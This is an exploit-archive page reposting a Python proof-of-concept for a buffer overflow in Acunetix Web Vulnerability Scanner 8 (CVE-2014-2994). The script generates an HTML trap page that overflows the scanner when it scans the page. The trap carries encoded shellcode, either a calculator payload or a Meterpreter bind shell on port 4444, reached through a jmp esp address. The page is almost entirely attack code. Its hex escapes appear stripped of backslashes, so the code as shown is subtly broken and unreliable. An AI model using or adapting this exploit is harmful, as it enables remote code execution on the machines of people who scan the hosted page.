Home / os / wins2003

Acunetix 8 Scanner Buffer Overflow

Posted on 25 April 2014

#!/usr/bin/python # Title: Acunetix Web Vulnerability Scanner Buffer Overflow Exploit # Version: 8 # Build: 20120704 # Tested on: Windows XP SP2 en # Vendor: http://www.acunetix.com/ # Original Advisory: http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html # Exploit-Author: Osanda Malith # Follow @OsandaMalith # Exploit write-up: http://osandamalith.wordpress.com/2014/04/24/pwning-script-kiddies-acunetix-buffer-overflow/ # /! Author is not responsible for any damage you cause # This POC is for educational purposes only # Video: https://www.youtube.com/watch?v=RHaMx8K1GeM # CVE: CVE-2014-2994 ''' Host the generated file in a server. The victim should select the external host. Otherwise we cannot trigger the vulnerability. ''' print ('[~] Acunetix Web Vulnerability Scanner Buffer Overflow Exploit ') while True: try: choice = int(raw_input("[?] Choose your payload: 1. Calculator 2. Bind Shell ")) except ValueError: print "[!] Enter only a number" continue if choice == 1: shellcode = "" shellcode += "x54x59x49x49x49x49x49x49x49x49x49x49x49" shellcode += "x49x49x49x49x49x37x51x5ax6ax41x58x50x30" shellcode += "x41x30x41x6bx41x41x51x32x41x42x32x42x42" shellcode += "x30x42x42x41x42x58x50x38x41x42x75x4ax49" shellcode += "x49x6cx6dx38x6ex69x75x50x73x30x77x70x63" shellcode += "x50x6fx79x68x65x30x31x49x42x63x54x4cx4b" shellcode += "x31x42x46x50x4cx4bx46x32x44x4cx6ex6bx70" shellcode += "x52x46x74x4cx4bx64x32x34x68x64x4fx4ex57" shellcode += "x30x4ax35x76x66x51x69x6fx64x71x69x50x6e" shellcode += "x4cx65x6cx71x71x61x6cx77x72x74x6cx31x30" shellcode += "x69x51x4ax6fx54x4dx53x31x69x57x39x72x58" shellcode += "x70x71x42x53x67x6ex6bx63x62x74x50x6ex6b" shellcode += "x53x72x57x4cx77x71x48x50x6cx4bx37x30x31" shellcode += "x68x4ex65x4bx70x43x44x31x5ax36x61x58x50" shellcode += "x62x70x6cx4bx31x58x34x58x6ex6bx42x78x77" shellcode += "x50x36x61x38x53x6bx53x67x4cx57x39x4ex6b" shellcode += "x77x44x4ex6bx47x71x69x46x34x71x49x6fx64" shellcode += "x71x39x50x6cx6cx6fx31x7ax6fx46x6dx47x71" shellcode += "x69x57x35x68x59x70x71x65x49x64x57x73x33" shellcode += "x4dx6ax58x35x6bx43x4dx67x54x31x65x6dx32" shellcode += "x61x48x6cx4bx51x48x34x64x66x61x6ex33x35" shellcode += "x36x6cx4bx66x6cx30x4bx4ex6bx43x68x45x4c" shellcode += "x33x31x4ax73x4cx4bx53x34x4ex6bx53x31x4e" shellcode += "x30x4cx49x37x34x54x64x54x64x73x6bx31x4b" shellcode += "x31x71x52x79x42x7ax53x61x79x6fx69x70x42" shellcode += "x78x63x6fx43x6ax6cx4bx77x62x7ax4bx6cx46" shellcode += "x53x6dx70x6ax57x71x4cx4dx4ex65x6ex59x53" shellcode += "x30x45x50x47x70x52x70x52x48x44x71x6ex6b" shellcode += "x42x4fx4bx37x6bx4fx78x55x4dx6bx6bx50x45" shellcode += "x4dx56x4ax47x7ax50x68x4fx56x4ex75x6fx4d" shellcode += "x4fx6dx59x6fx68x55x77x4cx46x66x51x6cx65" shellcode += "x5ax6dx50x6bx4bx4bx50x44x35x56x65x6fx4b" shellcode += "x71x57x64x53x54x32x42x4fx53x5ax33x30x61" shellcode += "x43x49x6fx68x55x33x53x33x51x52x4cx43x53" shellcode += "x65x50x41x41" break elif choice == 2: # Modify this part with your own custom shellcode # msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R| msfencode -e x86/alpha_mixed -t python shellcodeferRegister=ESP shellcode = "" shellcode += "x54x59x49x49x49x49x49x49x49x49x49x49x49" shellcode += "x49x49x49x49x49x37x51x5ax6ax41x58x50x30" shellcode += "x41x30x41x6bx41x41x51x32x41x42x32x42x42" shellcode += "x30x42x42x41x42x58x50x38x41x42x75x4ax49" shellcode += "x69x6cx4bx58x6cx49x65x50x73x30x73x30x31" shellcode += "x70x6ex69x48x65x70x31x59x42x55x34x4cx4b" shellcode += "x42x72x76x50x6cx4bx73x62x76x6cx4cx4bx53" shellcode += "x62x57x64x6ex6bx63x42x34x68x66x6fx48x37" shellcode += "x30x4ax54x66x55x61x79x6fx55x61x4bx70x4c" shellcode += "x6cx35x6cx30x61x33x4cx75x52x64x6cx67x50" shellcode += "x6fx31x5ax6fx54x4dx47x71x48x47x6bx52x38" shellcode += "x70x61x42x46x37x6ex6bx32x72x66x70x6ex6b" shellcode += "x73x72x75x6cx73x31x4ex30x6ex6bx71x50x43" shellcode += "x48x4bx35x49x50x61x64x72x6ax33x31x78x50" shellcode += "x76x30x4cx4bx77x38x35x48x6ex6bx53x68x61" shellcode += "x30x65x51x5ax73x69x73x77x4cx50x49x4ex6b" shellcode += "x56x54x6ex6bx45x51x69x46x75x61x6bx4fx66" shellcode += "x51x49x50x6cx6cx4bx71x78x4fx56x6dx35x51" shellcode += "x4ax67x50x38x59x70x61x65x39x64x67x73x31" shellcode += "x6dx6ax58x45x6bx43x4dx76x44x50x75x49x72" shellcode += "x52x78x6ex6bx61x48x46x44x43x31x68x53x45" shellcode += "x36x4ex6bx34x4cx42x6bx6ex6bx73x68x35x4c" shellcode += "x57x71x6bx63x4cx4bx53x34x6cx4bx43x31x4e" shellcode += "x30x4ex69x32x64x47x54x56x44x73x6bx61x4b" shellcode += "x75x31x31x49x72x7ax76x31x59x6fx59x70x61" shellcode += "x48x51x4fx31x4ax6cx4bx52x32x78x6bx6ex66" shellcode += "x43x6dx42x48x67x43x45x62x37x70x63x30x72" shellcode += "x48x42x57x32x53x76x52x31x4fx42x74x50x68" shellcode += "x52x6cx64x37x64x66x44x47x39x6fx69x45x4d" shellcode += "x68x5ax30x65x51x57x70x63x30x76x49x59x54" shellcode += "x31x44x52x70x45x38x64x69x4fx70x50x6bx57" shellcode += "x70x59x6fx7ax75x52x70x52x70x32x70x52x70" shellcode += "x47x30x30x50x67x30x66x30x63x58x48x6ax54" shellcode += "x4fx49x4fx69x70x79x6fx4ex35x4cx57x45x61" shellcode += "x6bx6bx51x43x73x58x73x32x57x70x34x51x73" shellcode += "x6cx6fx79x4ax46x42x4ax76x70x46x36x50x57" shellcode += "x71x78x7ax62x4bx6bx70x37x72x47x6bx4fx48" shellcode += "x55x62x73x51x47x72x48x4cx77x78x69x47x48" shellcode += "x4bx4fx69x6fx48x55x30x53x52x73x53x67x45" shellcode += "x38x62x54x5ax4cx67x4bx6dx31x69x6fx5ax75" shellcode += "x72x77x6cx57x62x48x54x35x50x6ex32x6dx35" shellcode += "x31x4bx4fx69x45x61x7ax77x70x32x4ax73x34" shellcode += "x62x76x61x47x70x68x63x32x78x59x4ax68x31" shellcode += "x4fx49x6fx48x55x6ex6bx46x56x51x7ax71x50" shellcode += "x62x48x65x50x46x70x63x30x43x30x31x46x32" shellcode += "x4ax55x50x71x78x31x48x49x34x66x33x6bx55" shellcode += "x59x6fx4ex35x4fx63x72x73x71x7ax37x70x30" shellcode += "x56x70x53x71x47x45x38x74x42x38x59x6fx38" shellcode += "x33x6fx49x6fx69x45x67x71x79x53x76x49x6b" shellcode += "x76x6fx75x48x76x62x55x58x6cx49x53x41x41" print "[+] Connect on port 4444" break else: print "[-] Invalid Choice" continue head = ("<html> <body> <center><h1>Scan This Site and Get Pwned :)</h1></center><br>") junk = (" <a href= "http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAA") edx = "500f" junk2 = "BBBB" # jmp esp | asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [WINHTTP.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.2180 (C:WINDOWSsystem32WINHTTP.dll) eip = "x49x63x52x4d" shellcode += "">" tail = ("<img src="http://i.imgur.com/BimAoR0.jpg"> </body> </html>") exploit = head + junk + edx + junk2 + eip + shellcode + tail filename = "Exploit.htm" file = open(filename, "w") file.write(exploit) file.close() print "[~] " + str(len(exploit)) + " Bytes written to file" #EOF

 

TOP

Malware :